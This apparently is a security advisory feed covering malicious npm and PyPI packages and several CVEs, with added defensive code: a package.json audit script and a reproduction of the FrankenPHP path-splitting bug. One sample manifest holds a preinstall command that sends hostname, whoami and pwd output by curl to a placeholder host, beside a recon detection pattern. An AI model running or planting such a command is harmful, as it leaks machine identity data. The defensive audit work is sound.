MAL-2026-5988 Malicious code in params-valid-js (npm)
Source: amazon-inspector 397af72237ba3626ac4727497662530f602c2ce6ec71406f48b508055687366c The package presents itself as 'Simplified HTTP request client' and copies identity metadata from Mikeal Rogers' legitimate request package bugs URL...
MAL-2026-5995 Malicious code in tobihook (PyPI)
Source: amazon-inspector 2c093ec7049ebbe26ca860033bc1fd81ad98f4f586b66fc68170e1ff81ae90bb The package masquerades as an HTTP helper (functions named post/get/fetch, a module comment ' request/init.py', and an unused requests dependency) but ea...
MAL-2026-5987 Malicious code in ogd-analytics (npm)
Source: amazon-inspector 1df5f4bdd6e2f58ff581cbad0d01738b5f6464794ace1a9fa95eea061a5bb7d5 package.json declares a preinstall lifecycle script that runs automatically during npm install. The script executes hostname, whoami, and pwd, then...
MAL-2026-5973 Malicious code in classbreeze-utils (npm)
Source: amazon-inspector e19daf4f946816f5ba3c6e592eacc980861b281c6752b738de57fdd31f49279d The package masquerades as a Tailwind plugin: README and the top of src/index.js are a verbatim clone of @tailwindcss/typography...
MAL-2026-5979 Malicious code in easy-day-js (npm)
Source: amazon-inspector 8602a5a154b50bb6351900a08fa45d7814c0f152e4379dcae53ccfa0b83db891 Package name 'easy-day-js' impersonates the popular 'dayjs' library, copying dayjs's author 'iamkun', homepage https://day.js.org, repository URL,...
MAL-2026-5975 Malicious code in cryptodao-contracts (npm)
Source: amazon-inspector 21c450a1d14c10213b83137f9c0670a9d8ed953105f96d66eedee78a56479d82 Package is published as version 99.99.99 to win private-vs-public resolution against an internal cryptodao-contracts namespace. The package's main...
MAL-2026-5970 Malicious code in cryptodao-types (npm)
Source: amazon-inspector 39fca1d76ba65e01fbd3319d6752bb0dc896f9cc356676c6bfad3671d8b1e0d9 On npm install, the package's postinstall script recon.js harvests installer-side secrets and POSTs them to attacker-controlled webhook endpoints. Th...
MAL-2026-5969 Malicious code in cryptodao-sdk (npm)
Source: amazon-inspector 03ac58e81310f19b32d136445eab91f7ddc776921ff8dfd08bdb91bcdd4a1da6 The cryptodao-sdk package ships a postinstall script recon.js that runs automatically on npm install and harvests installer-side secrets. The script...
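The npm entries above share two install-time patterns: a preinstall/postinstall lifecycle script that runs recon (hostname, whoami, pwd) or a dropped file such as recon.js, and an implausibly high version such as 99.99.99 chosen to win private-vs-public resolution. The following is an added example, not code from any of the advisories or the packages they describe, that audits a set of package.json manifests for both signals. The manifests, the package names, the recon keyword list and the major-version threshold (90) are constructed for this example.

```javascript
// Added example: audit package.json manifests for install-time lifecycle scripts
// and dependency-confusion style versions. Not from any advisory above.

// Hooks npm runs automatically when a dependency is installed from the registry.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall'];

// Commands and values that commonly show up in installer-side recon/exfil.
// Heuristic keyword list, an assumption of this example.
const RECON = /\b(hostname|whoami|pwd|uname|id)\b|\.npmrc|\$HOME|process\.env/;

// Versions with a major this high are rarely legitimate; assumption of this example.
const MAJOR_THRESHOLD = 90;

function auditManifest(pkg) {
  const findings = [];
  const scripts = pkg.scripts || {};

  for (const hook of INSTALL_HOOKS) {
    if (typeof scripts[hook] !== 'string') continue;
    const cmd = scripts[hook];
    findings.push({
      pkg: pkg.name,
      version: pkg.version,
      kind: 'lifecycle-script',
      hook,
      cmd,
      // A script that just runs "node recon.js" is opaque to the keyword test:
      // it is still reported (medium) so the referenced file gets read by a human.
      severity: RECON.test(cmd) ? 'high' : 'medium',
    });
  }

  const major = parseInt(String(pkg.version || '').split('.')[0], 10);
  if (Number.isInteger(major) && major >= MAJOR_THRESHOLD) {
    findings.push({
      pkg: pkg.name,
      version: pkg.version,
      kind: 'suspicious-version',
      severity: 'high',
    });
  }
  return findings;
}

// Audit every manifest (e.g. every node_modules/*/package.json) and flatten.
function auditTree(manifests) {
  return manifests.flatMap(auditManifest);
}

// Constructed sample manifests: one benign, one recon preinstall hook, one
// dependency-confusion version, one postinstall that defers to a dropped file.
const SAMPLE_MANIFESTS = [
  { name: 'example-utils', version: '1.4.2', scripts: { test: 'node test.js' } },
  {
    name: 'example-analytics',
    version: '0.1.0',
    scripts: {
      preinstall:
        'hostname; whoami; pwd | curl -s -X POST --data-binary @- https://hook.example.invalid/x',
    },
  },
  { name: 'example-contracts', version: '99.99.99', main: 'index.js' },
  { name: 'example-types', version: '1.0.0', scripts: { postinstall: 'node recon.js' } },
];

if (typeof require !== 'undefined' && require.main === module) {
  for (const finding of auditTree(SAMPLE_MANIFESTS)) {
    console.log(JSON.stringify(finding));
  }
}
```

The audit is a triage aid, not a blocker: the durable control is to stop lifecycle scripts from running at all on CI and developer machines (`npm install --ignore-scripts`, or `npm config set ignore-scripts true`) and to pin internal package names to the private registry scope so a public 99.99.99 cannot outrank them.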
SUSE CVE-2026-24895
FrankenPHP is a modern application server for PHP. Prior to 1.11.2, FrankenPHP's CGI path splitting logic improperly handles Unicode characters during case conversion. The logic computes the split index for finding .php on a lowercased copy of the request path but applies that byte index to the...
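The description above names the bug class: the split index is found on a lowercased copy of the path and then applied to the original, which only works while lowercasing preserves length. The following is an added example, not FrankenPHP's code, that reproduces the class in JavaScript with UTF-16 indices standing in for Go's byte offsets. The trigger character used (U+0130, LATIN CAPITAL LETTER I WITH DOT ABOVE, which lowercases to two code units) and the fix shown (folding only ASCII letters, which never changes length) are this example's choices; the fix in 1.11.2 may differ.

```javascript
// Added example, not FrankenPHP's code: index computed on a case-folded copy,
// applied to the original string.

// Return the index just past the first ".php" that ends a path segment, or -1.
// Operates on whatever string it is given; the caller decides what that is.
function findPhpEnd(lowered) {
  let from = 0;
  for (;;) {
    const i = lowered.indexOf('.php', from);
    if (i < 0) return -1;
    const end = i + '.php'.length;
    if (end === lowered.length || lowered[end] === '/') return end;
    from = i + 1;
  }
}

// Vulnerable shape: full Unicode lowercasing can change the string length,
// so an index found on the copy does not line up with the original.
function splitPathVulnerable(path) {
  const end = findPhpEnd(path.toLowerCase()); // index from the lowered copy...
  if (end < 0) return null;
  return { scriptName: path.slice(0, end), pathInfo: path.slice(end) }; // ...applied to the original
}

// Fold only A-Z. ".php" is ASCII, so that is all a case-insensitive match
// needs, and ASCII folding is one-to-one, keeping every index aligned.
function asciiLower(s) {
  return s.replace(/[A-Z]/g, (c) => String.fromCharCode(c.charCodeAt(0) + 32));
}

function splitPathFixed(path) {
  const end = findPhpEnd(asciiLower(path)); // same length as path, indices line up
  if (end < 0) return null;
  return { scriptName: path.slice(0, end), pathInfo: path.slice(end) };
}

if (typeof require !== 'undefined' && require.main === module) {
  // Constructed request path: U+0130 lowercases to "i" + U+0307, one unit longer.
  const path = '/\u0130/index.php/extra';
  console.log('vulnerable:', splitPathVulnerable(path)); // SCRIPT_NAME swallows the "/", PATH_INFO loses it
  console.log('fixed:     ', splitPathFixed(path));      // "/İ/index.php" and "/extra"
}
```

For ASCII-only paths both functions agree, which is why the defect survives ordinary testing; the mismatch only appears once a path segment before ".php" contains a character whose case mapping changes length. In Go the same happens at the byte level, including with characters whose lowercase form is shorter, so the index can also run off the end of the original.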
SUSE CVE-2026-42257
Net::IMAP implements Internet Message Access Protocol (IMAP) client functionality in Ruby. Prior to versions 0.4.24, 0.5.14, and 0.6.4, several Net::IMAP commands accept a raw string argument that is sent to the server without validation or escaping. If this string is derived from user-controlled...
CVE-2026-53441
A flaw was found in Jenkins. This vulnerability, a stored cross-site scripting (XSS) issue, allows attackers with Agent/Configure permission to inject malicious scripts into the user-provided description of a generic offline cause. When other users view this description, the injected script can...
PT-2026-50429
When NGINX Plus is configured as the data plane for NGINX Gateway Fabric, an injection vulnerability exists in the NGINX configuration generator component of NGINX Gateway Fabric. User-supplied string values from the NginxProxy Custom Resource Definition serverTokens field and the...